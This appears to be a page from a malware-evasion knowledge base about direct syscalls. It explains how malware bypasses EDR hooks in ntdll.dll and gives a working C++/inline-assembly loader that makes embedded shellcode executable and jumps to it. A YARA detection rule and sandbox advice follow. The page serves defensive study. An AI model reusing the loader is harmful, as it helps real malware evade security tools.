Evasion using direct Syscalls

Created the Thursday 18 May 2023. Updated 1 year, 4 months ago.

In the Windows operating system, conventional malware frequently utilizes strategies involving the invocation of specific functions from the kernel32.dll library, such as VirtualAlloc, VirtualProtect, and CreateThread. A closer inspection of the call stack reveals that the functions employed from kernel32.dll eventually trigger corresponding functions within the ntdll.dll library. This is facilitated by the ntdll.dll library, which serves as the gateway to the Windows kernel, executing this transition via system calls (syscalls). Hence, any function invoked from kernel32.dll will subsequently prompt one or more associated functions within ntdll.dll. To illustrate, the VirtualProtect function from kernel32.dll corresponds to the NtProtectVirtualMemory function in ntdll.dll.

Endpoint Detection and Response (EDR) and Antivirus (AV) systems generally hook onto the ntdll.dll, but only for a handful of crucial functions often exploited by malware. These systems actively monitor potentially exploitable behavior.

This technique can also be used for sandbox evasion. Some sandboxes log only higher-level WinAPI or NT API calls, but do not monitor or hook syscalls (or sysenters). Sandboxes that are missing these events will not see these calls. To combat this technique, ensure your sandboxes are able to log/hook syscalls and kernel function calls.

Unique Aspects of This Technique

The distinctiveness of this technique lies in its ability to invoke direct syscalls using assembly without calling upon any kernel32 or ntdll functions. It also bypasses the implementation of createthread by directly jumping to a custom heap variable, altering its protection, and finally returning for a clean exit - all without the need to allocate memory, change protection, and copy the payload to the new memory location.

Another intriguing aspect is the flexibility in naming the extern functions. These functions need not necessarily be called VirtualProtect or VirtualAlloc. They can have any arbitrary name of your choice, which enhances the complexity of analysis, particularly when disassembled. For instance, it could be named myCustomDontProtect, or even something obscure like rYTBbmNPTDoscUV.

Operational Mechanism

The main function initiates by setting up markers using inline assembly and then calls an extern function to unprotect the heap variable location containing the executable payload (in this instance, 'calc'). This extern function is converted into assembly code that triggers the syscall. Subsequently, the main function conserves the registers and prompts payload execution via another extern function. This function, in turn, translates to a "jmp" instruction that directs execution to the heap location, executing the payload. The payload contains instructions to return via another "jmp" instruction. The return location is preserved in the R15 register using inline assembly in the main function. Post return to the main function, the registers are restored, and the program gracefully terminates.

Technique Identifier

U0521

Technique Tags

Kernel32.dll VirtualAlloc VirtualProtect CreateThread Call stack Ntdll.dll Syscall NtProtectVirtualMemory EDRs/AVs Hook onto ntdll.dll Direct syscalls Assembly Heap variable

Code Snippets

Description

Additional details here: https://github.com/fr0gger/Unprotect_Submission/tree/c105bf119d923d8c5b44e26527fa6bbaf6a02699/techniques/EvasionUsingSyscall

//x86_64-w64-mingw32-g++ main.cpp -masm=intel -O0 -o direct_syscalls.exe
// credit to GhostPepper for the original PoC here: https://github.com/ghostpepper108/Evasion
// This is Steve (@tribouletx) version using inline assembly

#include <windows.h>
#include <stdio.h>

BYTE payload[] =   
	"\x90\x90\x90\x90\x58" // these get clobbered by syscall
	"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
    "\x48\x83\xec\x20\x41\xff\xd6\x41\xFF\xE7";

int main(){
	
	// Get current process handle
	HANDLE hProcess = GetCurrentProcess();
	
	// Get payload address
	PVOID baseAddress = payload;
	
	// Get region size
	SIZE_T regionSize = sizeof(payload);
	
	// Print messages
	printf("Address of baseAddress: %p\n", &baseAddress);
	printf("baseAddress: %p\n", baseAddress);
	
	// oldProtect, putting this variable inside of main() allocates it on the stack
	// putting this variable before the inline assembly ensures that it gets passed
	// to our syscall as the 5th variable to our syscall per the x86_64 convention
	SIZE_T oldProtect = 0x40;
	
	// Call NtProtectVirtualProtect
	asm("mov rcx, %0;" :: "m" (hProcess));
	asm("mov rdx, %0;" :: "r" (&baseAddress));
	asm("mov r8, %0;" :: "r" (&regionSize));
	asm("lea r9, [%0];" :: "r" (PAGE_EXECUTE_READWRITE));
	asm("mov r10,rcx;"
		"mov rax, 0x50;" // syscall number for NtProtectVirtualMemory
		"syscall");
	
	// Jmp here
	asm("return_main:;");
	
	// Jmp to payload, this works because our payload never touches r15
	asm("lea r15, [rip + return_main_2];"
		"jmp rax;"
		:: "r" (baseAddress));
	
	// Payload returns here
	asm("return_main_2:");
	
	printf("Sayonara!\n");
	
	return 0;
}

About Author Open Snippet

Author: ghost_pepper108 / Target Platform: Windows

Detection Rules

rule SUSP_Direct_Syscall_Shellcode_Invocation_Jan24 {
	meta:
		description = "Detects direct syscall evasion technqiue using NtProtectVirtualMemory to invoke shellcode"
		author = "Jonathan Peters"
		date = "2024-01-14"
		reference = "https://unprotect.it/technique/evasion-using-direct-syscalls/"
		hash = "f7cd214e7460c539d6f8d02b6650098e3983862ff658b76ea02c33f5a45fc836"
		score = 65
	strings:
		$ = { B8 40 00 00 00 67 4C 8D 08 49 89 CA 48 C7 C0 50 00 00 00 0F 05 [4-8] 4C 8D 3D 02 00 00 00 FF E0 }
	condition:
		all of them and
		filesize < 2MB
}

Contributors

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.